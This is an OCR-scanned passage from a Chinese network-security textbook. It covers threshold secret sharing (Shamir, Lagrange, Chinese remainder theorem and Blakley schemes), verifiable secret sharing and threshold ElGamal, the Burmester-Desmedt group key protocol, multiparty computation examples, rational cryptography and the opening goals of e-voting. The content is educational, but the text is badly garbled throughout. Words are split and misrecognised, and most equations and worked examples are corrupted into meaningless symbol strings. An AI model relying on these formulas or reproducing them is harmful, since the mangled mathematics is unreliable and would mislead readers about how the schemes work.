恢复 秘密 SK; 任何 m 一 1 或 更 少 的 共享 份额 是 不 能 得 到 关于 秘密 SK 的 任何 有 用 信息 。 


(3,5) 门 限 秘密 共享 方案 
图 9.2 秘密 共享 体制 的 主要 针对 问题 和 目标 以 及 最 常用 的 方案 模型 


(1) 基于 拉 格 朗 日 插值 多 项 式 的 秘密 共享 (m, n) 门 限 方案 ,如 图 9. 3 所 示 。 


假定 在 nn 个 人 中 共享 密 钥 ,使 得 任意 mm 个 人 可 以 相互 协作 获取 密 钥 。 

秘密 分 割 

图 生成 比 k 大 的 随机 素数 p。 

图 生成 m 一 1 个 随机 整数 R, ,R: ,…,R。 ,每 一 都 比 记 小 。 

图 使 用 F(z) 定义 为 有 限 域 上 的 多 项 式 。 

图 通过 定义 二 F(z;) 生 成 下 的 n 个 “影子 ”(z; 取 值 不 同 ) 。 

图 [p, xz;,k;] 作 为 标识 为 i 的 秘密 共享 者 秘密 分 量 ,并 销毁 R, ,R: ,… ,R。 和。 

秘密 重 构 

图 mm 个 线性 方程 可 以 构造 重 构 F(zx): 
F(z) = Dr I[ 一 


iD 
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图 9.3 基于 拉 格 朗 日 插值 多 项 式 的 秘密 共享 (m,n) 门限 方案 


(2) Shamir 门限 方案 如 图 9.4 所 示 。 


有 限 域 GF(g), g 为 大 素数 ,gq 宇 n 十 1。 秘密 sErGF(qg)\{0),k 一 1 个 系数 a， as，…， 
al， 其 中 a; ErGF(g)\{0}。 
在 GF(q) 上 构造 一 个 一 1 次 多 项 式 f(x) 一 ao 十 az 十 … 十 az 
w= f(0)=S 
分 配子 秘密 : N 个 参与 者 P, ，…，P,，P, 的 影子 (Shadow) 为 f(i)。 任 意 & 个 参与 者 得 到 
秘密 ,可 使 用 {Gi，f(i))11 一 1,，…, 上) 构造 方程 组 : 

人 二 a Ci) 二 二 ar(i)' (mod g) = f(i) 


ao ta(i) + ta i) (mod q) = f(i) 


基于 多 项 式 Lagrange 插值 公式 : f(z) = f(z) 了 守 二 加 


重 构 与 密 钥 恢 复 : 有 限 域 GF(g)Lagrange 插值 公式 : s 一 f(0)， 


fz) = 3710)1I mod 0 
em! 人 


s= (— DT DF) TT mod o) 


证 一 六 


图 9.4 ”Shamir 门限 方案 
(3) Shamir 门限 方案 的 实例 如 图 9.5 所 示 。 


例 k= 二 3, n= 二 5,g 二 19,s = 二 11。 随 机 选 al = 2, a:=7, f(x) = 7z 十 2z 十 11 mod 19。 
计算 f(1) = 1, f(2) = 5, f(3) = 4, f(4) = 17, f(5) = 6。 
已 知 f(2),f(3),f(5)，, 重 构 : 

(z 一 3)(z 一 5) ，，(z 一 2)(z 一 5) ，。(z 一 2)(z 一 3) 


Db 0 一 52 二 5 二 403 一 03 二 5 二 605 一 25 二 9 mod 19 
= 7z 十 2z 十 11 
3X5 2X5 2x3 
s- CD (sno 5+6 saa )"d19—11 
结果 : 


eo | 


图 9.5 Shamir 门限 方案 的 实例 


(4) 基于 中 国 剩余 定理 的 门限 方案 如 图 9. 6 所 示 。 
(5) 向 量 方案 如 图 9.7 所 示 。 
此 外 ,还 有 Mignotte 门限 秘密 共享 方案 .Asmuth-Bloom 门限 秘密 共享 方案 等 。 


9.1.2 可 验证 秘密 共享 : 坚实 的 架构 


设想 如 下 几 种 场景 : 

情景 1 一 一 上 校 Alice、Bob 和 Card 在 某 个 隔离 区 很 深 的 地 下 掩体 中 。 一 天 ,他 们 从 总 
统 那 里 得 到 密码 消息 :“ 发 射 那些 导弹 ,我 们 要 根除 这 个 国家 的 神经 网 络 研究 残余 。”Alice、 
Bob 和 Carol 出 示 他 们 的 “影子 ”, 但 Carol 却 输入 一 个 随机 数 。 她 实际 上 是 和 平 主义 者 ,不 
想 发 射 导弹 。 由 于 Carol 没有 输入 正确 的 “影子 ”, 因 此 他 们 恢复 的 秘密 是 错误 的 ,导弹 还 是 
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需 必 潞 


基于 案例 的 网 络 安 会 鞭 术 与 实践 


停放 在 发 射 划 中。 其 至 更 糟糕 的 是 ,没有 人 知道 为 什么 会 这 样 。 即 使 Alice 和 Bob 一 起 工 
作 , 他 们 也 不 能 证 明 Carol 的 “影子 ”是 无 效 的 。 


图 中 国 剩余 定理 : 令 mm ，…， m, 两 两 互 素 , a ，…， a, 为 整数 , 则 同 余 方 程 组 : 


z 三 4a; mod mi yi 一 1,…，r 对 模 M(= mms*…m,) 有 唯一 解 : x 二 》)aMiy; mod M， 


其 中 M;=M/m;， y; M;=1 mod m; 

图 举例 引入 : 问题 :已 知 z 三 2 (mod 9),z 三 8 (mod 11),z 三 9 (mod 13) 

则 有 如 下 结论 : 任何 一 个 方程 无 法 确定 z; 任何 2 个 方程 可 唯一 确定 x; 任何 3 个 方程 存在 
元 余 信息 :有 一 个 元 余 方 程 可 构造 (2,3) 门 限 方案 。 

工 三 9 (mod 13) 显 然 不 满足 ,其 他 一 样 

Zz 三 2 (mod 9),zt 三 8 (mod11), 则 zx 二 74 (mod 99),r = 74 

I 三 2 (mod 9),r=8 (mod1D),z=9 (mod13), 则 z= 74 (mod 1287),zx = 74 
图 实例 构造 : 

首先 选取 ?个 严格 递增 的 mm ，zma ，…，m,， 满 足 : 

(1) (ms my) 一 1 (对 所 有 i 关门 


(2) mma me > mm nt 
S 是 秘密 , 满足 mms*…m 5 之 mwm,-1"…mw-s+z， 可 构造 (k,n) 门 限 方案 : 
子 密 钥 的 分 发 
5 二 s(mod mi) (i 一 1, …，N),(mi，si) 为 一 子 密 钥 
口 密 钥 的 恢复 


ss5, (mod ms; ) 
(1) 当 上 个 参与 者 提供 子 密 钥 时 ,可 建立 方程 组 | : 

ss, (mod zi ) 
(2) 由 中 国 剩余 定理 可 以 求 得 s 三 s' mod N,N' 为 k 个 m 的 乘积 ,s 三 是 唯一 的 
如 果 仅 有 一 1 个 参与 者 ,只 能 求 得 s 三 % mod y, 无 法 确定 s。 
图例 k= 二 2,n 二 3,5 二 4, m= 9, mm 二 11, ms 二 13,mms 二 99 之 13 = ms，, 此 范围 选 
取 s 二 74。 子 秘密 分 发 ,s 三 2 (mod 9), s 三 8 (mod 11), s 三 9 (mod 13); 其 中 (9, 2)、 
(11, 8)、(13, 9) 构 成 (2,3) 门 限 方案 : 
若 已 知 (9, 2)，(11, 8) ,可 建立 方程 组 : 

FE- 2 (mod 9) 


s 三 8 (mod 11) 
解 得 s 三 (11X5X2 十 9X5X8) mod 99 三 74, 故 s 二 74。 


9.6 ”基于 中 国 剩余 定理 的 门限 方案 


情景 2 一 一 上 校 Alice 和 Bob 与 Mallory 正 坐 在 掩体 中 。Mallory 假装 也 是 上 校 , 其 他 
人 都 不 能 识破 。 同 样 的 消息 从 总 统 那 里 来 了 ,并 且 每 人 都 出 示 了 他 们 的 “影子 ”,“ 喻 , 喻 1” 
Mallory 大 叫 起 来 ,我 伪造 了 从 总 统 那里 来 的 消息 ,现在 我 知道 你 们 两 人 的 "影子 "了 ”。 在 
其 他 人 抓 住 他 以 前 ,他 和 仆 上 楼 梯 逃 跑 了 。 

情景 3 一 一 上 校 Alice、Bob 和 Carol 与 Mallory 一 起 坐 在 掩体 中 ,Mallory 又 是 伪装 的 
( 记 住 ,Mallory 没有 有 效 的 影子 ) 。 同 样 的 消息 从 总 统 那 里 来 了 ,并 且 每 人 都 出 示 了 他 们 的 
“影子 ”,Mallory 只 有 在 看 到 他 们 3 人 的 “影子 ”后 才 出 示 他 的 “影子 ”。 由 于 重 构 这 个 秘密 
只 需要 3 个 影子 ,因此 他 能 够 很 快 地 产生 一 个 有 效 的 “影子 ”并 出 示 。 现 在 ,他 不 仅 知道 了 秘 
密 , 而 且 没 有 人 知道 他 不 是 这 个 方案 的 一 部 分 。 


图 向 量 方案 
George Blakley 发 明了 一 个 使 用 平面 上 的 点 的 门限 方案 。 秘 密 定 义 为 一 个 上 维 空间 的 点 。 每 
个 分 享 是 一 个 (1 一 1) 维 的 包括 这 个 点 的 超 平面 。 任 何 t 个 超 平 面 的 交点 则 刚好 可 以 决定 
秘密 。 
图 一 般 方案 
机 制 : Blakley 有 (zt, n) 门 限 方案 ; 摘要 : 可 信 方 分 配 秘密 S 的 分 享 给 n 个 用 户 。 
结果 : 任何 上 个 用 户 的 组 提交 他 们 的 分 享 就 可 以 恢复 秘密 S。 
(1) 建立 可 信 方 有 一 个 秘密 S==S, 并 希望 分 给 n 个 用 户 。 
QT 选择 一 个 素数 pp 二 so。。T 选择 模 p 的 随机 数 s ,sw ,… ,s,-1 ,并 在 模 p 的 t 维 空间 定义 
一 个 点 QCso ya ys "5-1)。 


回 工 随机 选择 :一 1 个 相互 独立 模 的 系数 wa ，,…,ar: ,1 三 i 过 nn, 设 定 y 一 5 一 3 : 


5 (mod 思 并 安全 地 传输 对 应 超 平面 z.， 一 5 ai .= 十 y 给 每 个 P, 作为 分 享 。 


(2) 恢复 秘密 。 任 何 上 或 更 多 个 用 户 提交 他 们 的 分 享 。 他 们 的 分 享 提供 了 + 个 不 同 的 超 平面 
来 计算 点 Q==(50 5,52,"… ,si1)。 例 如 ,t 个 用 户 P;,1<i<<t。 他 们 的 超 平面 可 以 产生 短 


阵 : 
a a —1\/s —y 
a a  —1||s, y 
三 (mod p) 
a a 1l/\s —¥ 


只 要 和 矩阵 的 行列 模 p 不 等 于 0, 和 矩阵 模 p 就 是 可 逆 矩 阵 。 
恢复 的 秘密 就 是 S, 一 S。 
图 实例 
考虑 建立 一 个 (3,5) 门 限 方案 。 令 p 二 73。 假 定 有 5 个 人 A、B、C、D、E, 他 们 可 以 得 到 如 下 超 
平面 : 
Alr 一 4.zm 十 19。zi 十 68;Birs = 52° zo+27 .zi 二 10; 
Cizr = 36° zo+65° x1 +18;D:z: 一 57。zm 十 12。zi 十 16; 


E:zrs 一 34。z 十 19。zi 十 49。 
如 果 A、B.C 想 恢复 秘密 ,他 们 可 以 解 : 


4 19 一 1fzo 一 68 
52 27 —1||x |= |—10 |(mod 73) 
36 65 一 1/ 八 zz 一 18 


解 是 (zzri'zz) 一 (42,29,57), 因 此 ,秘密 就 是 S 一 mm 一 42。 同 样 地 ,任何 ABC.D、E 中 的 
3 个 就 可 以 联系 恢复 秘密 S。 


9.7 向 量 方案 


上 述 场景 就 是 秘密 共享 方案 中 的 欺骗 问题 。 针 对 此 问题 ,Chor、Gildwasser、 Micali、 
Awerbuch 提出 获得 基于 因子 分 解难 题 的 秘密 共享 , 称 新 的 协议 为 可 验证 秘密 共享 ,每 一 方 
可 以 验证 收 到 的 秘密 是 否 是 正确 的 。 此 外 .Benaloh 提出 怎样 获得 可 验证 的 秘密 共享 , 即 对 
每 一 方 可 验证 所 收 到 的 秘密 进行 补充 一 一 如 果 存 在 单 向 函数 的 假设 前 提 下 可 以 容忍 少数 方 
共 谋 。Goldwasser 等 指出 怎样 得 到 完全 容错 分 布 式 计算 , 即 在 每 一 方 使 用 正确 的 纠 错 码 ， 
抗 第 三 方 串 谋 ,不 进行 密码 学 假设 。 
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秘密 共享 中 的 欺骗 问题 可 总 结 如 下 : 

(1) 此 方法 存在 的 欺骗 问题 包括 在 重建 阶段 的 参与 者 欺骗 与 分 割 阶段 的 分 派 者 欺骗 。 

(2) 参与 者 欺骗 是 指 参与 者 可 能 丢 出 假 的 子 秘密 ,使 得 只 有 他 自己 能 解 出 共享 的 秘密 ， 
而 其 他 人 无 法 解 出 该 秘密 。 

(3) 分 派 者 欺骗 是 指 分 派 者 可 能 把 假 的 子 秘密 给 参与 者 ,使 得 该 参与 者 无 法 在 日 后 重 
建 共享 的 秘密 。 

(4) 解决 方案 包括 子 秘密 应 具备 可 验证 性 (verifiable) 与 通过 数字 签名 解决 。 

实例 : 可 验证 门限 ElGamal 方案 如 图 9. 8 所 示 。 


图 EIGamal 方案 
建立 : 随机 选择 大 素数 p,q 满足 glp 一 1, 计 算 F; 的 g 阶乘 法 生成 元 g 
私 钥 : s€ Z,-， 
公 钥 : y=g’ mod Pp, 公 开 pgsy 
消息 : mp 
(1) 选择 随机 数 hkE 2Z，-， 
加 密 : / (2) 计算 A=g*(mod p) 
(3) 计算 B=my* (mod p) 
密 文 : (A,B) 
解密 : mm 一 B/A'Cmod p) 
国 门限 EIGamal 方案 组 成 
密 钥 生成 算法 (Key generation algorithm) 
随机 选择 大 素数 pg 满足 g1z 一 1, 计 算 F; 的 g 阶乘 法 生成 元 g , 私 钥 :*EkZ,-， 
公 钥 : y= 二 g’ mod p, 公 开 pg,y。 


利用 Shamir 秘密 共享 方案 分 配 *: 
令 f(0) =s,f(z)=s 十 aiz', 对 于 每 一 个 ai(1 三 i 人 是 从 Z, 随即 选择 。 
秘密 密 钥 SK, 是 


5s= f(r modq(l<i<h 
然后 计算 验证 密 钥 : VK = 二 v,VK ;==v' mod p,for i=1,*…,k。 
加 密 算法 (Encryption algorithm) 
消息 : m 二 p 
(1) 选择 随机 数 有 EZ 
加 密 : {® 计算 A = g*(mod p) 
(3) 计算 B = my*(mod p) 
密 文 : (A,B) 
共享 解密 算法 (Share decryption algorithm) 
不 失 一 般 性 ,假设 索引 从 1 到 t 十 1, 每 个 成 员 计算 : 


s+ 


T= [| mod gw,= A modp 


合并 算法 (Combining algorithm) 
合并 节点 (Combiner) 计 算 : 


tl 


下 Wi = AS:. = ho = A: = y ,m= BY) (mod p) 


图 9.8 可 验证 门限 ElGamal 方案 


9.1.3 BD 协议 : 提高 效率 


BD 协议 是 由 Burmester 和 Desmedt 提出 的 一 种 知名 的 非 认 证 组 密 钥 协商 协议 ,用 于 
实现 nn 个 成 员 间 协商 共同 的 会 话 密 钥 ,虽然 BD 协议 具有 良好 的 通信 效率 和 时 间 复 杂 度 ,但 
是 由 于 在 实际 应 用 中 ,存在 很 多 安全 性 和 功能 性 缺陷 ,因此 近 几 年 得 到 了 广泛 的 研究 。 
图 9.9 简明 地 表达 了 BD 协议 的 流程 : P; 代表 第 i 个 参与 方 ,(X; ,zx;) 分 别 是 P; 的 公私 钥 
对 ,K;、Z; 是 中 间 协 商 值 ,交互 过 程 为 广播 形式 。 


i 了 Ps 
Nig TiA Zp TN Zn 
本 二 0 ZN-g”" 
X! 本 Xn 
KX2! 天 一 Xi Kn<Xi™ 
Kn<—XN' KX 开 v- 一 XN 
ZKi/Ky ZKi/Ki Zn—Kn/Kn_1 
SK<Ki*: Ks ee Ky 


图 9.9 BD 协议 的 基本 流程 


通过 Qiang Tang 等 人 的 研究 可 以 看 出 ,BD 协议 虽然 可 以 抵抗 被 动 攻击 , 即 攻击 者 仅 
能 窃听 通信 信息 ,但 是 无 法 抵抗 主动 攻击 ,例如 : 恶意 的 协议 内 参与 者 可 以 控制 其 他 的 参与 
者 ,使 协商 的 密 钥 为 特定 值 ,这 样 违背 了 所 有 参与 者 对 被 协商 密 钥 具 有 相同 贡献 的 要 求 。 

针对 BD 协议 存在 的 问题 ,目前 研究 者 们 的 主要 改进 思路 是 使 BD 协议 具有 认证 能 力 ， 
且 可 以 进一步 分 为 两 类 : 非 基 于 双 线 性 映射 的 BD 协议 和 基于 双 线 性 映射 的 BD 协议 。 具 
体 来 说 ,为 了 使 非 基 于 双 线 性 映射 的 BD 协议 实现 认证 能 力 , 主 要 采用 了 传统 的 具有 认证 能 
力 或 签名 能 力 的 方案 ,相关 研究 有 : Burmester 和 Desmedt 采用 交互 式 零 知识 证 明 改 进 的 
BD 协议 使 其 具有 认证 能 力 ,但 依然 无 法 抵抗 某 些 主动 攻击 的 问题 ,例如 : 中 间 人 攻击 、 内 部 
不 同 密 钥 攻 击 、 外 部 /内 部 冒充 攻击 ; 2003 年 ,Katz 等 人 提出 了 一 种 编译 器 可 以 将 被 动 安全 
的 组 密 钥 协商 方案 转换 为 可 以 抵抗 主动 攻击 的 认证 协议 ,而 且 作 为 实例 ,将 BD 协议 进行 了 
转换 ,但 是 研究 发 现 其 无 法 抵抗 内 部 不 同 密 钥 攻击 一 一 任意 的 "一 2 个 内 部 攻击 者 可 以 让 其 
他 合法 用 户 协 商 不 出 相同 的 密 钥 ; 在 此 基础 上 ,为 了 严格 地 处 理 组 密 钥 协商 的 内 部 攻击 者 
问题 ,2005 年 Katz 等 人 形式 化 定义 了 组 密 钥 协 商 协议 的 内 部 攻击 ,并 进一步 提出 了 一 种 用 
于 实现 通用 可 组 合 (Universal Composability, UC) 安 全 协议 的 理想 函数 的 定义 ,为 以 后 的 
安全 性 研究 提供 了 理论 基础 ; 2008 年 ,为 了 解决 BD 协议 无 法 抵抗 不 同 密 钥 攻击 的 问题 , 崔 
国 华 和 郑 明 辉 等 人 依然 采用 签名 方案 实现 BD 协议 的 认证 能 力 和 抵抗 内 部 不 同 密 钥 攻击 的 
能 力 。 

由 于 双 线 性 映射 特有 的 数学 特性 ,和 其 可 以 有 效 构建 基于 身份 密码 方案 的 特点 ,基于 双 
线性 映射 的 BD 协议 的 研究 也 是 目前 的 热点 领域 之 一 。2000 年 ,Joux 提出 了 第 一 个 基于 双 
线性 映射 的 BD 协议 ,其 主要 应 用 了 双 线 性 映射 的 计算 特点 ,使 得 组 密 钥 的 协商 可 以 在 3 方 
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之 间 很 容易 实现 ,但 他 也 没有 考虑 其 主动 安全 性 问题 。 在 此 基础 之 上 ,2003 年 和 2004 年 ， 
X. Du 和 K. Y. Choi 等 人 分 别提 出 了 两 种 实用 的 基于 身份 BD 协议 ,它们 具有 相同 的 思 
想 , 但 是 在 效率 方面 各 有 所 长 : X. Du 等 人 的 协议 需要 2 轮 通信 ,每 个 参与 者 的 时 间 复 杂 度 
为 常数 次 双 线 性 映射 ,标量 乘法 和 徊 运算 与 参与 者 总 数 成 正比 ; K. Y choi 等 人 的 协议 需要 
1 轮 通信 ,每 个 参与 者 的 时 间 复 杂 度 为 常数 次 标量 乘法 、 双 线性 映射 次 数 和 参与 者 总 数 成 正 
比 ,因此 这 两 个 协议 那个 更 优 还 依赖 于 具体 的 应 用 环境 。 虽然 上 述 两 个 方案 在 执行 效率 上 
均 实用 ,但 是 在 安全 性 上 确 存在 缺陷 ,2003 年 Fanggu Zhang 等 人 分 析 了 这 两 个 组 密 钥 协商 
协议 ,发 现 如 果 任 意 两 个 恶意 的 内 部 攻击 者 拥有 某 合法 参与 者 以 前 的 认证 副本 , 则 可 以 冒充 
该 参与 者 在 新 的 组 中 协商 密 钥 。 针 对 该 缺陷 ,2003 年 ,X. Du 等 人 提出 了 一 个 改进 协议 ,但 
是 Qiang Tang 等 人 发 现 该 改进 协议 依然 存在 无 法 抵抗 内 部 攻击 者 的 冒充 问题 。 针 对 内 部 
攻击 的 问题 ,2008 年 Lung-Chung Li 等 人 提出 了 可 以 抵抗 现 有 所 有 已 知 攻击 的 组 密 钥 协 商 
协议 ,而 且 该 协议 仅 需 1 轮 通 讯 , 但 是 在 每 个 参与 者 的 时 间 复 杂 度 方面 ,其 双 线 性 映射 的 计 
算 次 数 与 参与 者 数 成 正比 ,因此 时 间 开 销 相对 较 大 。 

综 上 所 述 ,BD 协议 是 经 典 的 组 密 钥 协商 协议 之 一 ,虽然 其 可 以 抵抗 被 动 攻击 ,但 是 却 
无 法 抵抗 主动 攻击 ,因此 在 实际 环境 中 缺乏 安全 性 。 针 对 这 一 点 ,研究 者 们 提出 了 很 多 改进 
方案 ,但 其 主要 思想 相同 , 即 参与 者 需要 具有 身份 认证 能 力 , 而 且 由 于 双 线 性 映射 的 出 现 及 
其 特有 的 数学 特性 ,也 使 其 成 为 众多 改进 方案 的 重要 工具 。 虽 然 改进 的 BD 协议 逐步 实现 
了 安全 性 ,但 是 过 多 的 计算 双 线 性 映射 也 使 一 些 改进 协议 中 参与 者 的 时 间 复 杂 度 可 能 过 高 ， 
从 而 降低 实用 性 。 


9.1.4 保密 的 多 方 计算 初探 


保密 的 多 方 计算 是 一 种 协议 ,在 这 个 协议 中 ,一 群 人 可 在 一 起 用 一 种 特殊 的 方法 计算 许 
多 变量 的 任何 函数 。 这 一 群 中 的 每 个 人 都 知道 这 个 函数 的 值 ,但 除了 函数 输出 外 ,没有 人 知 
道 关 于 任何 其 他 成 员 输入 的 任何 事情 。 保 密 的 多 方 计算 的 基本 特征 是 : 两 方 或 多 方 参与 者 
基于 他 们 各 自私 密 输 入 的 计算 ,彼此 都 不 想 其 他 方 知道 自己 的 输入 信息 。 

案例 1: 平均 工资 问题 。 一 群 人 在 无 仲裁 者 的 情况 下 ,怎样 才能 计算 出 他 们 的 平均 薪水 
而 又 不 让 任何 人 知道 其 他 人 的 薪水 呢 ? 如 图 9. 10 所 示 。 


(1) Alice 在 她 的 薪水 上 加 一 个 秘密 的 随机 数 ,并 把 结果 用 Bob 的 公开 密 钥 加 密 , 然 后 把 它 送 
给 Bob。 

(2) Bob 用 他 的 私 钥 对 Alice 的 结果 解密 。 他 把 他 的 薪水 加 到 他 从 Alice 那里 收 到 的 结果 上 ， 
用 Carol 的 公开 密 钥 对 结果 加 密 , 并 把 它 送 给 Carol 。 

(3) Carol 用 她 的 私 钥 对 Bob 的 结果 解密 。 她 把 她 的 薪水 和 她 从 Bob 那 收 到 的 结果 相 加 ,再 
用 Dave 的 公开 密 钥 对 结果 加 密 ,并 把 它 送 给 Dave。 

(4) Dave 用 他 的 私 钥 对 Carol 的 结果 解密 。 他 把 他 的 薪水 和 他 从 Carol 那 收 到 的 结果 相 加 ， 
再 用 Alice 的 公开 密 钥 对 结果 加 密 , 并 把 它 送 给 Alice。 

(5) Alice 用 她 的 私 钥 对 Dave 的 结果 解密 。 她 减 去 第 (1) 步 中 的 随机 数 以 恢复 每 个 人 薪水 之 
总 和 。 

(6) Alice 把 这 个 结果 除 以 人 数 (在 这 里 是 4) ,并 宣布 结果 。 


图 9. 10 ”多方 安全 计算 的 一 种 场景 一 一 无 条 件 多 方 安全 协议 


分 析 : 这 个 协议 假定 每 个 人 都 是 诚实 的 。 如 果 参 与 者 谎报 了 他 们 的 薪水 , 则 这 个 平均 
值 将 是 错误 的 。 一 个 更 严重 的 问题 是 Alice 可 以 对 其 他 人 谎报 结果 。 在 第 (5) 步 她 可 以 从 
结果 中 减 去 她 喜欢 的 数 , 并 且 没有 人 能 知道 。 

这 只 是 一 般 定理 的 一 种 简单 情况 : 任何 输入 的 函数 可 以 被 个 人 用 这 种 办 法 计算 ， 
使 得 所 有 人 都 知道 函数 的 值 ,但 任何 少 于 n/2 个 人 的 一 群 人 都 得 不 到 除了 他 们 自己 的 输入 
以 及 输出 信息 值 之 外 的 任何 附加 信息 。 

案例 2: 终身 伴侣 问题 。Alice、Bob 都 在 寻找 终身 伴侣 ,他 们 的 兴趣 爱好 不 同 : Alice 喜 
欢 KTV 、 得 街 、 劲 乐团 ,Bob 更 倾向 于 NBA、 足 球 、 聚 会 。 目 标 是 ; 找 一 个 趣味 相投 的 终身 伴 
侣 ,但 却 不 能 直接 表达 自己 的 择偶 目标 。 

一 种 有 效 解决 方案 : 

(1) 使 用 一 个 单 向 函数 ,Alice 将 她 的 择偶 要 求 m 作为 单 向 函数 的 输入 得 到 一 个 8 位 数 
字 的 字符 串 h(m),Alice 用 这 8 位 数字 作为 电话 号 码 拨号 ,并 留言 ; 如 果 电 话 号 码 无 效 ， 
Alice 给 这 个 电话 号 码 申请 一 个 单 向 函数 直到 她 找到 一 个 与 她 有 相同 择偶 要 求 的 人 。 

(2) Alice 告诉 Bob 她 为 她 的 择偶 要 求 申请 一 个 单 向 函数 的 次 数 。 

(3) Bob 用 和 Alice 相同 次 数 的 Hash 他 的 择偶 要 求 ,他 也 用 这 个 8 位 数字 作为 电话 号 
码 ,试图 听取 留言 ,有 留言 , 则 配对 成 功 。 

分 析 : Bob 可 以 进行 “选择 明文 攻击 ”: 可 以 Hash 一 般 的 择偶 要 求 ,拨打 所 得 的 电话 号 
码 , 以 窃听 留言 。 因 此 ,只 有 在 不 可 能 得 到 足够 多 的 明文 消息 的 情况 下 该 协议 安全 。 

案例 3: 保密 电路 计算 。Alice 的 输入 为 a,Bob 的 输入 为 5。 他 们 希望 一 起 计算 一 些 普 
通 函 数 f(a,5) ,这 样 使 得 Alice 不 知道 Bob 的 输入 情况 ,Bob 也 不 知道 关于 Alice 的 输入 情 
况 。 保 密 多 方 计算 的 一 般 性 问题 也 称 为 保密 电路 计算 。 这 里 ,Alice 和 Bob 可 以 创造 一 个 
任意 的 布尔 电路 ,这 个 电路 接受 来 自 Alice 和 来 自 Bob 的 输入 并 产生 一 个 输出 。 保 密 电 路 
计算 是 一 个 完成 下 面 3 件 事 的 协议 : 

(1) Alice 可 以 键入 她 的 输入 且 Bob 不 能 知道 它 。 

(2) Bob 可 以 键入 他 的 输入 且 Alice 不 能 知道 它 。 

(3) Alice 和 Bob 都 能 计算 出 这 个 输出 ,双方 都 确信 输出 是 正确 的 且 没 有 一 方 能 筑 改 它 。 


9.1.5 理性 密码 学 : 博弈 的 游戏 


首先 给 出 一 个 案例 : 警方 逮捕 甲乙 两 名 嫌疑 犯 , 但 没有 足够 证 据 指控 二 人 和 人 罪 。 于 是 
警方 分 开办 禁 嫌 疑犯 ,分 别 和 二 人 见面 ,并 向 双方 提供 以 下 相同 的 选择 ,如 表 9. 1 所 示 。 


表 9.1 囚徒 困境 
甲 沉默 (合作 ) 甲 认罪 (背叛 ) 
乙 沉 默 (合作 ) 二 人 同 服刑 半年 甲 即时 获释 ; 乙 服 刑 10 年 
乙 认罪 (背叛 ) 甲 服刑 10 年 ; 乙 即 时 获释 二 人 同 服刑 2 年 


(1) 若 一 人 认罪 并 作证 检控 对 方 (相关 术语 称 “ 背 叛 ” 对 方 ) ,而 对 方 保持 沉默 ,此 人 将 即 
时 获释 ,沉默 者 将 判 监 10 年 。 

(2) 若 二 人 都 保持 沉默 (互相 “合作 ”), 则 二 人 同样 判 监 半年 。 

(3) 若 二 人 都 互相 检举 (互相 “背叛 ”), 则 二 人 同样 判 监 2 年 。 
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办 徒 思 考 过 程 如 下 : 

(1) 囚徒 困境 假定 每 个 囚徒 都 是 利己 的 , 即 都 寻求 最 大 自身 利益 ,而 不 关心 另 一 参与 者 
的 利益 。 两 名 囚徒 由 于 隔绝 监禁 ,并 不 知道 对 方 选择 ; 而 即使 他 们 能 交谈 ,还 是 未 必 能够 尽 
信 对 方 不 会 反 口 。 就 个 人 的 理性 选择 而 言 , 困 境 中 两 名 囚徒 会 做 如 下 思考 : 

GD 车 对 方 沉默 .我 背叛 会 让 我 获释 ,所 以 会 选择 背叛 。 

@ 车 对 方 背 叛 指控 我 ,我 也 要 指控 对 方才 能 得 到 较 低 的 刑期 ,所 以 也 是 会 选择 背叛。 

(2) 二 人 面 对 的 情况 一 样 ,所 以 二 人 的 理性 思考 都 会 得 出 相同 的 结论 一 一 选择 背叛 , 结 
果 二 人 同样 服刑 2 年 。 以 全 体 利益 而 言 ,如 果 两 个 参与 者 合作 而 都 保持 沉默 ,两 人 都 只 被 判 
刑 半 年 ,总 体 利益 更 高 ,结果 比 两 人 背叛 对 方 、 判 刑 2 年 的 情况 较 佳 。 但 根据 以 上 假设 ,二 人 
均 为 理性 的 个 人 , 且 只 追求 自己 个 人 利益 。 均 衡 状况 是 两 个 囚徒 都 选择 背叛 ,结果 二 人 判 监 
均 比 合作 为 高 ,总 体 利益 较 低 。 

传统 上 ,密码 协议 的 分 析 当 中 假定 一 些 参与 者 是 “好 的 ”, 他 们 严格 执行 协议 (即使 可 能 
会 伤害 自身 利益 ) ,而 其 他 人 则 是 “ 坏 的 ”, 试 图 破坏 协议 ,原因 不 明 。 理 想 的 假设 下 ,一 个 密 
码 协议 假设 参与 协议 的 人 中 ,至 少 有 固定 比例 的 一 些 表现 为 “好 的 ”。 

从 博弈 论 的 角度 来 说 ,* 好 / 坏 "的 代理 人 模型 应 被 蔡 换 为 更 现实 的 假设 , 即 所 有 参与 主 
体 既 不 好 也 不 坏 ,而 是 他 们 的 行动 都 将 最 大 限度 地 扩大 自己 的 利益 。 

参与 者 利益 相 搏 的 博弈 论 和 密码 正 逐 渐 融 合成 为 一 个 独立 的 研究 领域 ,通常 被 称 为 理 
性 密码 学 。 

理性 密码 协议 主要 考虑 以 下 3 个 要 素 ， 

(1) 设计 协议 ,其 中 的 参与 者 没有 动力 进行 其 他 行为 ( 即 不 遵守 协议 的 行为 ) ,并 且 确 信 
其 他 参与 者 也 被 暗示 遵循 协议 。 

(2) 设计 混合 协议 ,一 部 分 的 参与 者 是 理性 的 , 另 一 部 分 相互 匀 结 ,甚至 在 没有 利益 的 
前 提 下 依然 会 背离 协议 的 执行 规则 。 

(3) 利用 诱惑 和 密码 学 使 理性 的 参与 者 提供 正确 的 计算 输入 ,并 在 博弈 理论 设计 中 用 
密码 学 实现 可 信 的 中 间 人 。 


9.2 电子 选举 协议 


9.2.1 电子 选 欠 协议 : 公平 和 隐私 


电子 选举 是 典型 的 安全 多 方 计 算 实例 ,是 安全 协议 的 重要 应 用 之 一 ,是 电子 商务 安全 性 
研究 的 一 项 重要 内 容 。 在 传统 密码 领域 .对 电子 选举 方案 (Electronic Voting Scheme， 
EVS) 的 研究 已 有 20 多 年 的 历史 ,针对 不 同 规模 和 不 同 环境 的 选举 目前 已 取得 一 些 初 步 的 
研究 成 果 。 

通常 来 说 ,一 个 安全 的 电子 选举 方案 应 该 至 少 达到 以 下 7 个 方面 的 目标 。 

(1) 完备 性 : 即 所 有 合法 的 选票 都 应 当 被 正确 统计 。 

(2) 正当 性 : 即 恶 意 的 投票 者 无 法 破坏 选举 。 

(3) 保密 性 : 即 选票 内 容 是 保密 的 , 且 不 能 由 选票 内 容 获 得 投票 人 的 信息 。 

(4) 不 可 重复 性 : 即 任何 合法 的 投票 人 只 能 投 一 次 选票 。 


(5) 合法 性 : 即 只 有 具有 投票 权 的 投票 人 才 有 资格 投票 。 


(6) 公正 性 : 即 选举 的 中 间 结 果 不 能 泄露 。 
